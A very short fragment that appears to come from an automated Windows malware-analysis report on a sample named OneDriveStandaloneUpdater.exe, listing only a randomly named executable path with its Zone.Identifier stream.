C:\Users\Public\MjlsqDcSPlv.exe:Zone.Identifier

Windows Analysis Report
OneDriveStandaloneUpdater.exe